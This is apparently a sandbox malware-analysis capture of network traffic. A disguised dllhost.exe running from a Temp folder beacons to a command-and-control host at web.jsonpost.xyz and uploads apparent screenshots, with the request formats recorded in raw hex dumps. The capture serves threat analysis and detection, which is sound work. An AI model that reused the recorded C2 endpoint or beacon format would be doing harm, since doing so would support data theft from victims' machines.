                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:09.075212002 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:09.195286989 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:09.195358038 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:09.195441961 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:09.195539951 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:09.195729971 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:09.315344095 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:53:09.315507889 CET4944OUTData Raw: 1d 09 af 3b db 62 7f e7 e3 ff 00 c0 bf e0 9e c7 d5 70 7f f3 e9 7f e0 3f f0 0f 2f d4 74 eb 8d 32 ed ad ae 17 0c bd 08 e8 c3 d4 55 4a ed bc 51 02 cd e1 9b 2d 4c 5d 4f 32 ce 63 68 c4 c9 18 2a ae a5 bf 84 75 e9 df 15 c4 d7 d1 e0 71 12 af 4a f3 5a a7
                                                                                Data Ascii: ;bp?/t2UJQ-L]O2ch*uqJZcs\$0iu((JZ(QE%QEQELQEQEQEJ(@)(QAQECEPIKI%-%;QEQIK@QEE0(%-(0J(J)))i(-%R)


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                90192.168.2.44985872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:10.326472998 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                91192.168.2.44986072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:10.593267918 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:10.593336105 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:10.593437910 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:10.593457937 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:10.713475943 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:10.713494062 CET2472OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:10.713551044 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:53:10.713638067 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:10.713751078 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:10.713860035 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:10.833906889 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                92192.168.2.44986572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:11.750669003 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                93192.168.2.44986672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:12.080267906 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1f222d7432ca15c9e43b1e0ff82cdbaa
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98266
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:12.080324888 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 66 32 32 32 64 37 34 33 32 63 61 31 35 63 39 65 34 33 62 31 65 30 66 66 38 32 63 64 62 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1f222d7432ca15c9e43b1e0ff82cdbaaContent-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:12.080410957 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:12.080436945 CET1236OUTData Raw: 30 c6 28 a3 f1 a3 26 80 13 f3 34 9d fb 52 9c e7 b5 1c d0 34 25 27 5a 5c 73 cd 25 00 21 ed 41 eb 4b 8f d2 90 f0 45 31 81 a4 23 9a 5a 31 fa 7a 52 01 3a d0 28 e6 8c fe 14 c6 20 a0 52 fb d2 50 01 ef d6 8e 28 e9 fc a8 cd 03 13 b8 f7 a3 fc f3 4b 8a 0d
                                                                                Data Ascii: 0(&4R4%'Z\s%!AKE1#Z1zR:( RP(K!h4%/I@Ezt:iE'J))sJh&,uwtRHa(QE))h(QE(BgRh`-.MRmSE&n)4hw#'}6z
                                                                                Nov 29, 2024 01:53:12.200592995 CET4944OUTData Raw: 8c d1 9a 34 01 bb 48 a4 35 ab a2 69 c7 58 d5 e0 d3 fc ef 2b cd dd f3 95 dd 8c 29 6e 99 1e 95 d7 1f 86 59 ff 00 98 b8 ff 00 c0 5f fe ce b8 6b e3 e8 d0 9f 24 f7 3d 1c 36 59 88 c4 d3 f6 94 d2 b7 a9 e7 94 57 a1 7f c2 b0 ff 00 a8 bf fe 4b 7f f6 75 8d
                                                                                Data Ascii: 4H5iX+)nY_k$=6YWKux&IpoI\T*sJ9_7KnZ);GN(bEwv~[]jYv};wq1yn=L_eyI]W]ggw+o$
                                                                                Nov 29, 2024 01:53:12.200989962 CET18540OUTData Raw: 0f 52 8d 3c 3f 2b 92 b3 77 93 b2 7f e6 45 45 35 a5 54 8f cc 60 e2 3d 9e 66 fd 87 1b 77 6d dd 9c 74 dd c6 7d 78 ab 33 da 5d da 2a 35 d5 9d d5 ba b9 c2 99 a0 74 0d f4 24 0a f7 3d a4 2f 6b a3 e5 7d 95 4b 5f 95 db d0 82 8a 42 40 19 27 00 54 97 10 cf
                                                                                Data Ascii: R<?+wEE5T`=fwmt}x3]*5t$=/k}K_B@'Tis2XU20HVQGiww'{6q`8"#C Is:Z#WY1IXb0s^f+GS9i{8Wz&@
                                                                                Nov 29, 2024 01:53:12.320673943 CET2472OUTData Raw: 53 b5 d6 9e d7 9b 40 8b 73 ed 0f 22 2b ba a1 c1 65 42 43 30 04 1c 90 08 18 3e 86 ac 02 19 41 1d 08 cd 65 d8 dc 6a 3f d8 f0 e9 b7 67 54 85 61 12 a2 0b 3b f6 8e 07 47 62 e0 4b 16 d2 1c 82 c4 64 15 c8 c0 3d 2b 4d 06 d8 d5 7d 00 15 df 81 a9 5e 70 fd
                                                                                Data Ascii: S@s"+eBC0>Aej?gTa;GbKd=+M}^p+3SWNq#:E<Lgu8Vs`3G#*Hj+hr=oww-+D\,TCR'IkZdW0]lcu~%GR9)4wo8
                                                                                Nov 29, 2024 01:53:12.320728064 CET2472OUTData Raw: 47 ed 6c 73 4d 19 34 c2 a4 7d 2b ad 5d 3b 4b 53 f3 09 a4 fc 71 56 ed ec 34 d9 a2 b9 44 b3 55 d9 03 38 66 3b 88 22 a2 58 e8 c5 6c cb 8d 66 dd ac 70 c5 69 a4 7b d4 ce 31 51 63 35 e8 46 57 57 37 4c 61 14 d2 31 4f c6 69 a2 a8 b1 9d e9 a6 9e 7f ce 29
                                                                                Data Ascii: GlsM4}+];KSqV4DU8f;"Xlfpi{1Qc5FWW7La1Oi)qL49O<4o;Zx5,L44zC'KwTNs]Es/n-Gq[-\`+>b6nq]$i8I|[Qykoshv"
                                                                                Nov 29, 2024 01:53:12.320830107 CET4944OUTData Raw: 00 09 25 41 3d 00 1d eb d4 cb 71 55 5c fd 8d 47 7b ea 9d ee 78 59 d6 02 84 69 fd 62 8a e5 b3 b3 56 b1 8f 45 14 57 b8 7c c0 51 45 14 01 77 47 b5 8e f7 58 b4 b5 9b 3e 5c b2 84 6c 1c 1c 1a f4 2f f8 40 34 6f ef 5d 7f df c1 fe 15 c1 f8 77 fe 46 3d 3b
                                                                                Data Ascii: %A=qU\G{xYibVEW|QEwGX>\l/@4o]wF=;]$a1yxJNMiY9Uoh*+LwK?kFw?_Oc?:u
                                                                                Nov 29, 2024 01:53:12.361809969 CET28428OUTData Raw: e5 0c ae 4a 32 a2 b3 36 0e 33 c6 c6 1d 3a 8a e3 a3 37 2f e1 5d 33 49 8d 2d 24 6b 7b 29 52 e0 cb 66 8d 22 bb 4c ee 02 c8 c8 58 7c a4 1f 95 b1 cf ae 6b 5f fb 4a da 5d 7b 5c bb be 9a 53 65 e6 5e 4d a6 4e b1 31 c1 96 27 43 19 18 c8 56 2c ad ec 57 fd
                                                                                Data Ascii: J263:7/]3I-$k{)Rf"LX|k_J]{\Se^MN1'CV,WiK/meeucRIKr/-+-HdP)y.@[|n]0rqjK==l$x-LTX(xe*"K~zv$XX"&3cqtXI
                                                                                Nov 29, 2024 01:53:12.481775045 CET12360OUTData Raw: ac 29 63 4d a5 a4 34 86 14 94 b4 94 0c 4a 28 34 50 30 34 da 71 a6 d0 31 28 a5 34 94 14 14 94 1a 4a 00 3b d2 52 f7 a4 34 0c 29 29 69 28 18 94 51 49 4c 61 49 41 34 84 d2 1a 0c d2 66 8a 28 28 29 0d 19 a4 34 00 1a 4a 5a 43 4c 62 1a 0d 07 3d 68 3d 29
                                                                                Data Ascii: )cM4J(4P04q1(4J;R4))i(QILaIA4f(()4JZCLb=h=)LRhv4;K(>'^^44/4Z)?/JCLbGFsHbw?!4"Hh#OZ:b<0GEVgQ@Q@Q@Q@/IKI@


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                94192.168.2.44987172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:13.172992945 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                95192.168.2.44987272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:13.600236893 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:13.600323915 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:13.600397110 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:13.600420952 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:13.720398903 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:13.720581055 CET7416OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:13.720581055 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:13.720680952 CET4944OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:53:13.720696926 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:13.720788956 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
